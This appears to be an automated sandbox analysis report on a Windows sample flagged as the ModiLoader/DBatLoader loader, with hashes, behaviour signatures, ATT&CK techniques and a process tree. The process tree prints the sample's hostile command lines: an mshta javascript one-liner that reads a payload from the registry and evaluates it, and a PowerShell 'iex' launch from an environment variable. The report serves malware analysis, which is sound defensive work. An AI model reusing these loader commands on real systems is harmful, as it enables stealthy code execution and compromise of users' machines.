Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 02:18

General

  • Target

    648f4f03a8972d907c18031a1f3181e9.exe

  • Size

    377KB

  • MD5

    648f4f03a8972d907c18031a1f3181e9

  • SHA1

    369418d52aa47b0e9bf0b2f3ad3a8d057a86d82e

  • SHA256

    11144876769ba20e6e361575697502a98052b1f3cd510ba70eb6b75824e09adf

  • SHA512

    a04d20e9c1abbcf979eb9ed9485aa9362ff6175cdf298486bd031fbc629803ec625203545dd8f6c39219207af99400cc25e54e554191e3b98a1b0ee9b55e2f72

  • SSDEEP

    6144:GjOqZB1XdvAHUSb4P2wJVXvMKH/i7a6qiu8OQOIOiNexjS:GlDdYHUScpJVXUKH/iW1DBioe

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 13 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\648f4f03a8972d907c18031a1f3181e9.exe
    "C:\Users\Admin\AppData\Local\Temp\648f4f03a8972d907c18031a1f3181e9.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:4740
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:r5c2EvB="QnpJhm";v08E=new%20ActiveXObject("WScript.Shell");Hu2nMoP2="9Di1vvl";B4tpx=v08E.RegRead("HKLM\\software\\Wow6432Node\\6qtB69THcn\\5zkVWlRcb");J7pOiQt="7AG9hQx";eval(B4tpx);eIrW8f0ws="ulJK";
    1⤵
    • Process spawned unexpected child process
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:iunfn
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2772

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sujx4tcs.1dn.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2772-34-0x0000000005EF0000-0x0000000006244000-memory.dmp
    Filesize

    3.3MB

  • memory/2772-36-0x0000000006420000-0x000000000646C000-memory.dmp
    Filesize

    304KB

  • memory/2772-21-0x0000000005770000-0x0000000005D98000-memory.dmp
    Filesize

    6.2MB

  • memory/2772-38-0x00000000074B0000-0x00000000074CA000-memory.dmp
    Filesize

    104KB

  • memory/2772-22-0x0000000005630000-0x0000000005652000-memory.dmp
    Filesize

    136KB

  • memory/2772-37-0x0000000007B00000-0x000000000817A000-memory.dmp
    Filesize

    6.5MB

  • memory/2772-35-0x00000000063E0000-0x00000000063FE000-memory.dmp
    Filesize

    120KB

  • memory/2772-23-0x0000000005E10000-0x0000000005E76000-memory.dmp
    Filesize

    408KB

  • memory/2772-24-0x0000000005E80000-0x0000000005EE6000-memory.dmp
    Filesize

    408KB

  • memory/2772-20-0x0000000005020000-0x0000000005056000-memory.dmp
    Filesize

    216KB

  • memory/4740-11-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB

  • memory/4740-16-0x0000000074BE0000-0x0000000074D00000-memory.dmp
    Filesize

    1.1MB

  • memory/4740-10-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB

  • memory/4740-2-0x0000000000400000-0x000000000043B000-memory.dmp
    Filesize

    236KB

  • memory/4740-12-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB

  • memory/4740-18-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB

  • memory/4740-17-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB

  • memory/4740-13-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB

  • memory/4740-8-0x0000000002C90000-0x0000000002CA0000-memory.dmp
    Filesize

    64KB

  • memory/4740-9-0x0000000002C90000-0x0000000002CA0000-memory.dmp
    Filesize

    64KB

  • memory/4740-15-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB

  • memory/4740-14-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB

  • memory/4740-42-0x0000000002C90000-0x0000000002CA0000-memory.dmp
    Filesize

    64KB

  • memory/4740-43-0x0000000002C90000-0x0000000002CA0000-memory.dmp
    Filesize

    64KB

  • memory/4740-44-0x000000000ADA0000-0x000000000AE76000-memory.dmp
    Filesize

    856KB